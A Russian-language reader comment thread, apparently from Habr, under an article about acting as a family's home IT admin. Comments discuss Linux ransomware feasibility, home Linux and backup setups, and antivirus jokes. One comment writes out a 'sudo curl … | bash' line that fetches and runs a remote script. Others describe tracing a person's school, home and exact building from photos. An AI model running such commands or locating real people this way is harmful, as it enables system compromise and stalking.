Комментарии 58
Ха! Много лет назад?
До сих пор не устанавливаю СбербанкОнлайн, потому то в EULA есть пункт один, не поленюсь, перепечатаю даже:
"Банк имеет право вносить изменения в настоящую Политику путем размещения новой редакции Политики на сайте Банка и/или в приложении. Обязанность самостоятельного ознакомления с актуальной редакцией Политики лежит на пользователе."
Это же не какой-то мелкий WhatsApp, чтобы заранее предупреждать, чтобы дать время подумать, а целый Сбер, ему всё можно! Интересно есть ли у них запланированное время, скажем минута, когда редакция Политики обновляется на сейте на минуту, и ваши данные становятся "не только вашими".
UPD: нажал на тестовом "согласен", и дальше "Разрешить управление телефонными звонками", а дальше еще интереснее "доступ к фото, мультимедиа и файлам на устройстве".
А в чем проблема написать шифровальщик пользовательских данных для Linux? Интересно с технической стороны, потому что убедить неопытного пользователя запустить его — дело социнженерии, другое дело это то, в чем проблема отработать шифрование в Linux? То, что их нет, КМК, Linux'ом пользуются люди, на которых социнженерия не работает.
Файл, который вы скачаете в linux, не будет отмечен как исполняемый. Тут или рассказывать, как добавить права на запуск, или пытаться дать человеку deb/rpm пакет, что приведёт к вопросам от системы "А точно ли вы это хотите? А введите-ка пароль.".
Т.е. в Linux невозможно написать скрипт Bash/Java/Perl чтобы он зашифровал home?
Права на то чтобы отработать в home? Ведь там все пользовательские данные, а у запускающего пользователя туда полный доступ и там все данные. Или какие-то другие права Вы имели ввиду?
Эммм. Опять не полностью понял, судя по описанию, команда дает полный доступ к файлам и папкам, но у пользователя уже есть доступ к своему home. Или в Linux есть тонкости запуска скриптов, и скрипты не запускаются из папок с полным доступом?
Она долго ругалась на зависимости. Я все зависимости установил. По одной.
Потом выяснилось, что у меня ядро неправильное. Тут я сдался — смена ядра тестовой виртуалки в мои планы на поиграть не входила.
И да, постоянно просила пароль для повышения прав, но мне было сильно интересно, сможет она что-то сделать, или нет.
Не шмогла.
sudo curl http://mysite.com | bash Главная проблема написать шифровальщик под линукс — на порядок меньший охват аудитории, чем в случае виндовс.
Затем, где-то через неделю, мы продолжили эксперимент. Я предложил взять любой аккаунт друга и найти по фото его школу и адрес дома, попутно показав, как работать с геометками. К собственному удивлению, он смог это сделать по шести случайным фотографиям.
Вот это странно, соцсети же удаляют геометки из фото.
Предлагаю автору продолжить эксперимент дальше: сделать фото вида из окна и (удалив геометки о проч.) загрузить в поиск по картинкам яндекса. Очень удивитесь: с довольно высокой вероятностью он может точно указать район, откуда было сделано фото.
А зная район, можно уже без труда определить место съёмки с точностью до подъезда и этажа — банально «походив» по панорамам улиц и прочертив несколько линии на карте.
Ну а чтоб совсем довести
После этого попробовал воткнуть его на ноут, которым чаще пользовалсь жена. Воткнул и забыл поменять приоритет загрузки. Каково же было мое удивление, когда жена (наткнувшись на незнакомый десктоп) задала только два вопроса — где браузер и где редактор изображений. После моих ответов — вопросов больше не было, и она даже смогла корректно выключить комп…
После этого я забыл про винду и вирусы и антивирусы. Так хорошо забыл что потом уже в 10-е у знакомых пол часа искал сетевые настройки…
Старый комп (где были когда то хрюша и аваст) был отдан родителю пенсионеру — пока был здоров — пользовался без проблем — но там буквально блокнот и браузер.
Подросшим детям был вручен сначала неттоп с linux на борту, потом еще ноут стой же ОС.
Пару раз получал запосы от жены и детей на запуск exe-файлов или даже более конкретные «а не мог бы ты поставить винду». Но я сдюжил найти им альтернативы для их exe.
Безопасность дети изучали сами (на своих шишках) — на одном телефоне в штатном браузере андроида висела плашка с требованием заплатить штраф за просмотр детского порно, были и угнанные акаунты в соцсетях… Ну конечно вначале у меня еще что-то спрашивали, но сейчас я на их компы только обновления и новые версии ОС ставлю — со своими акаунтами они разбираются сами. Пароли у них есть и по 30 символов (хоть и не очень сложные). А т.к. в школе у них винда, а дома Linux — им в принципе теперь без разницы до ОС (пусть они конечно не сильно лезут в потроха и на винде и на Linux).
Пароль WiFi у меня ~50 символов полной чепухи из символов. Флаг в руки запомнить. Но т.к. у меня в сети ничего особо так просто не найти и не взять — гостей можем и подключить… правда чаще всего зовут меня для этого…
На роутере — OpenWRT (поставленный туда в день покупки).
И да — на детских компах — никаких привязанных карт и т.п. Потери файлов/фоточек — практически не возможны: syncthing синхронизирует все ценное на три ноды: детский неттоп (там большой HDD воткнут, а ОС на ssd), старый ноут с воткнутым в него большим HDD (лежит на антресоли) и мой рабочий комп (в офисе). На двух нодах (разнесенных географически: антресоль и офис) делается бекап.
Название конечно было многообещающее, а по итогу пшик рекламный.
Вот у меня дома 2 минисервера на малинке, еще один сервер для VPN внешний. Все это друг с другом дружит, и так далее. Вот это да, это админ домашний, а поставить антивирус, мое почтение.
А какие интересные случаи и рецепты приучения к сетевой гигиене родственников расскажете вы?
Не про гигиену, но про отсутствие необходимости постояяно «чинить» комп:
Раньше при недельном отсутствии у родителей — помогал только format c:/
Поставил Shadow Defender и вот уже лет семь наверное не переустанавливаю винду у них, никаких проблем абсолютно.
Правда отец иногда жалуется почему у него скачанные фильмы или игры пропадают после перезагрузки..)
А где лайфхаки для гиков? Ни одного не нашёл…
Есть ещё вариант с nfc-метками. Видел статью про создание таких меток для андройд-устройств. При чём, насколько я понял, установка дополнительного ПО у пользователей не требуется.
Мастер Мурамаса делал самурайские мечи как разящее оружие. Мастер Масамунэ — как оружие, которым защищают свою жизнь. Чтобы сравнить их клинки вонзили в дно ручья. По течению плыли опавшие листья. Все листья, что прикасались к мечу Мурамаса, оказывались рассеченными на две части. Листья оплывали меч Масамунэ, не касаясь его.
Петр Данилович Нортон делал антивирусы, грозные, как разящее отмщение
ангела. Евгений Валентинович Касперский делал антивирусы, твердые, как
железобетонный забор. Чтобы сравнить, их антивирусы поставили на Microsoft Windows хP Profеssionаl в локальной сети, по которой постоянно
распространялись вирусы. Все вирусы, что попадались антивирусу Нортона,
оказались уничтоженными. А машину с антивирусом Касперского вирусы попросту обходили стороной, ведь при 100% загрузке CPU сетевой адаптер не успевает общаться с сетью.
Я не отношу себя к той части пользователей, которая в каждом чихе видит рекламные интеграции, но такое количество упоминаний Kasperski заставили меня на минуточку задуматься.
Минимализм в быту: как стать домашним админом и не свести семью с ума